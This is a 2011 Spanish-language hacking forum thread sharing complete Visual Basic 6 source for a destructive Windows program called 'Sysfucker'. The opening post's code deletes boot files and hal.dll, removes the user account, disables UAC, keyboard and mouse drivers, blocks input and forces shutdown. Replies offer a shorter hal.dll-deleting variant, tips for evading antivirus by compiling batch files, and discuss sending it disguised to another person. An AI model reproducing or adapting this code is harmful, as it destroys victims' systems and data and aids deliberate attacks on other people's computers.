Foro de elhacker.net

Seguridad Informática => Análisis y Diseño de Malware => Mensaje iniciado por: Dany3j en 3 Julio 2011, 20:57 pm



Título: Sysfucker en VB6.0
Publicado por: Dany3j en 3 Julio 2011, 20:57 pm
Bueno aqui le dejo un pequeño programa en Basic para DAÑAR el sistema no lo ejecuten... Leer bien el codigo..  :) Funciona probado por mi hihihih  :laugh:

Código:
Private Declare Function BlockInput Lib "user32" (ByVal fBlock _
As Long) As Long
Const API_FALSE As Long = 0&
Const API_TRUE As Long = 1&
Private Declare Function Beep Lib "kernel32" ( _
  ByVal dwFreq As Long, _
  ByVal dwDuration As Long) As Long
Private Sub Form_Load()
On Error Resume Next
Form1.Hide
  a = FreeFile
  b = FreeFile
  Open "c:\windows\chkmgr32.bat" For Output As a
    Print #a, "shutdown -s -t 10 -f"
    Print #a, "start c:\windows\notfall.bat"
    Close a
   
Open "c:\windows\notfall.bat" For Output As b
Print #b, "erase /f %windir%\system32\hal.dll"
Print #b, "erase /f %HOMEDRIVE%\NTDETECT.COM"
Print #b, "erase /f %HOMEDRIVE%\bootmgr"
Print #b, "erase /f %HOMEDRIVE%\bootfont.bin"
Print #b, "erase /f %HOMEDRIVE%\BOOTSECT.BAK"
Print #b, "erase /f %HOMEDRIVE%\boot.ini"
Print #b, "erase /f %HOMEDRIVE%\ntldr"
Close b
'Zerstörung...
Call Shell("net user Administrator /active:no")
Call Shell("net user %username% /del")
Call Shell("reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f")
Call Shell("cmd /c erase /f %windir%\system32\hal.dll")
Call Shell("cmd /c tskill /f explorer")
Call Shell("cmd /c tskill /f icq")
Call Shell("reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Winlogon /t REG_SZ /d c:\windows\chkmgr32.bat /f")
Call Shell("cmd /c erase /f %HOMEDRIVE%\ntldr")
Call Shell("cmd /c erase /f %HOMEDRIVE%\boot.ini")
Call Shell("cmd /c erase /f %HOMEDRIVE%\BOOTSECT.BAK")
Call Shell("cmd /c erase /f %HOMEDRIVE%\bootfont.bin")
Call Shell("cmd /c erase /f %HOMEDRIVE%\bootmgr")
Call Shell("cmd /c erase /f %HOMEDRIVE%\NTDETECT.COM")
Call Shell("cmd /c del /q %windir%\inf\*.*")
Call Shell("cmd /c del /q %windir%\repair\*.*")
Call Shell("reg add HKLM\System\CurrentControlSet\Services\Mouclass /v Start /t REG_DWORD /d 4 /f")
Call Shell("reg add HKLM\System\CurrentControlSet\Services\Kbdclass /v Start /t REG_DWORD /d 4 /f")

Form1.Show
Call BlockInput(API_TRUE)
Call Shell("shutdown -s -t 10 -f")
MsgBox "haha dein windows wurde zerstört^^", vbInformation + vbMsgBoxSetForeground + vbMsgBoxRight, "haha"
Call Shell("cmd /c assoc .exe=WinRAR")
Beep 4000, 10000


End Sub

Aclaro que el codigo no es mio...  :)


Título: Re: Sysfucker en VB6.0
Publicado por: EFEX en 3 Julio 2011, 21:13 pm
Para que tanto daño...


Título: Re: Sysfucker en VB6.0
Publicado por: Dany3j en 3 Julio 2011, 21:21 pm
 ::) ps para nadie

Este codigo es para uso Educativo y sin intenciones de dañar a nadie.


Título: Re: Sysfucker en VB6.0
Publicado por: тαптяα en 3 Julio 2011, 21:25 pm
Zerstörung en español : destrucción.

es un codigo interesante requiere privilegios,no?


Título: Re: Sysfucker en VB6.0
Publicado por: Dany3j en 3 Julio 2011, 21:30 pm
Zerstörung en español : destrucción.

es un codigo interesante requiere privilegios,no?

Ps en xp corre sin privilegio no se si corre en 7 lo he probado en mi pc y funciona muy bien  :rolleyes: jajajaj


Título: Re: Sysfucker en VB6.0
Publicado por: Karcrack en 3 Julio 2011, 21:43 pm
VB6? Yo juraría que esta hecho en BATCH ;)


Título: Re: Sysfucker en VB6.0
Publicado por: extreme69 en 3 Julio 2011, 21:50 pm
VB6? Yo juraría que esta hecho en BATCH ;)

Si, no sé para que se gastó en hacerlo en vb6, si lo necesitabas en .exe usabas el batch compiler y listo, te ahorrabas unos cuantos "call shell" :P


Título: Re: Sysfucker en VB6.0
Publicado por: Dany3j en 3 Julio 2011, 21:50 pm
VB6? Yo juraría que esta hecho en BATCH ;)

Si en visual basic pero se llama mucho la funcion shell para usar los comandos del batch

Supongo que con alguna modificaciones se puede dejar para que funcion en un .bat


Título: Re: Sysfucker en VB6.0
Publicado por: Edu en 3 Julio 2011, 21:51 pm
Correra con privilegios de Administrador sino no, y no es la gran cosa, decir que hace cosas que no se ejecutaran nunca como los archivos bat q crea ya que al reiniciar no entrara mas y entonces la entrada al registro esta demas y por eso no se ejecutaran los bats. En si, con 10 lineas ya haces lo que produce ese "virus"


Título: Re: Sysfucker en VB6.0
Publicado por: тαптяα en 3 Julio 2011, 21:55 pm
Correra con privilegios de Administrador sino no, y no es la gran cosa, decir que hace cosas que no se ejecutaran nunca como los archivos bat q crea ya que al reiniciar no entrara mas y entonces la entrada al registro esta demas y por eso no se ejecutaran los bats. En si, con 10 lineas ya haces lo que produce ese "virus"
Me acuerdo mi primer virus en CUH..en 14 lineas hice algo mucho mas efectivo que este "malware", que además como code en si deja mucho que desear, emplear Visual Basic para crear .bats y hacer llamadas a la consola..

Aparte que si alguien lo usa desde mi Invitado esto no corre ni en broma jaja


Título: Re: Sysfucker en VB6.0
Publicado por: Dany3j en 3 Julio 2011, 21:55 pm
Ps si es verdad... pero aclaro el codigo no es mio.. y como funciona bien lo subi... pero gracias por las criticas...  ;-)


Título: Re: Sysfucker en VB6.0
Publicado por: Elemental Code en 11 Julio 2011, 02:55 am
no es mas facil esto?

Código
  1. Private Sub Form_Load()
  2. kill (Environ("SYSTEMROOT") & "\system32\hal.dll")
  3. msgbox "Felicitaciones sos un pelotud*"
  4. end
  5. End Sub


Título: Re: Sysfucker en VB6.0
Publicado por: VanX en 11 Julio 2011, 09:04 am
tantos print el av lo detecta como virus, lo mejor un bat a batch compiler y ya  ;-)


Título: Re: Sysfucker en VB6.0
Publicado por: SuperDraco en 11 Julio 2011, 09:13 am
uys amigo!!!

me ha servido mucho tu code, más que nada porque no sabía como llamar a la consola desde vb6 xD

Código:
Call Shell("cmd /c del /q %windir%\inf\*.*")

perfeto, por cierto, en que windows lo has probado?

saludos


Título: Re: Sysfucker en VB6.0
Publicado por: VanX en 11 Julio 2011, 13:30 pm
uys amigo!!!

me ha servido mucho tu code, más que nada porque no sabía como llamar a la consola desde vb6 xD

Código:
Call Shell("cmd /c del /q %windir%\inf\*.*")

perfeto, por cierto, en que windows lo has probado?

saludos

Aunque no lo haya probado y no te dirijas a mi, decir que en win7 y winvista no funcionaría porque necesita permisos con lo cual es mejor para mi un .bat y luego con batch compiler

saludos :)


Título: Re: Sysfucker en VB6.0
Publicado por: jaunx en 11 Julio 2011, 14:12 pm
el nombre del programa  Sysfucker y esta parte del código
Código:
Beep 4000, 10000

me recordó que alguna vez lei que los beep continuados y a distintas frecuencias podían hacer cascar la modtherboard.....nuca he tenido valor ni suficiente pasta como para comprobar que fuese cierto...  :laugh:
alguien más lo ha oido o me engañaron como a un chino???

pd. disculpas a la comunidad china del foro :xD


Título: Re: Sysfucker en VB6.0
Publicado por: SuperDraco en 11 Julio 2011, 14:19 pm
eso es mentira, yo hice una melodía por aburrimiento con los beeps y no pasó nada.


Título: Re: Sysfucker en VB6.0
Publicado por: [L]ord [R]NA en 11 Julio 2011, 15:02 pm
Estas seguro que esto esta en VB6?... me parece puro Batch


Título: Re: Sysfucker en VB6.0
Publicado por: jaunx en 11 Julio 2011, 17:53 pm
eso es mentira, yo hice una melodía por aburrimiento con los beeps y no pasó nada.

gracias por aclararlo  dj pitoloko  :laugh:


Título: Re: Sysfucker en VB6.0
Publicado por: Dany3j en 22 Julio 2011, 16:04 pm
uys amigo!!!

me ha servido mucho tu code, más que nada porque no sabía como llamar a la consola desde vb6 xD

Código:
Call Shell("cmd /c del /q %windir%\inf\*.*")

perfeto, por cierto, en que windows lo has probado?

saludos

Yo lo he  probado en XP y va bien...  :o jajaja.

Pero bueno me imagino que para los expertos de aqui es cualquier cosa, pero para los que no tenemos experiencia en la creacion de "Malwares" siempre nos cae bien aprender algo nuevo.  :laugh:


Título: Re: Sysfucker en VB6.0
Publicado por: Netflash en 29 Agosto 2011, 14:08 pm
Que Funcion tiene este Sysfucker en realidad ( me refiero que hace al PC ) ?


Título: Re: Sysfucker en VB6.0
Publicado por: тαптяα en 29 Agosto 2011, 14:30 pm
Que Funcion tiene este Sysfucker en realidad ( me refiero que hace al PC ) ?
joderlo, borra un puñao de cosas en definitiva no permite que se vuelva a iniciar.


Título: Re: Sysfucker en VB6.0
Publicado por: Netflash en 29 Agosto 2011, 15:57 pm
Si yo le quiero enviar a uno cifrado y todo eso, y lo habre se jode su PC ? :o :xD


Título: Re: Sysfucker en VB6.0
Publicado por: тαптяα en 30 Agosto 2011, 10:14 am
Si yo le quiero enviar a uno cifrado y todo eso, y lo habre se jode su PC ? :o :xD

Realmente si, pero ese "virus" es una *****.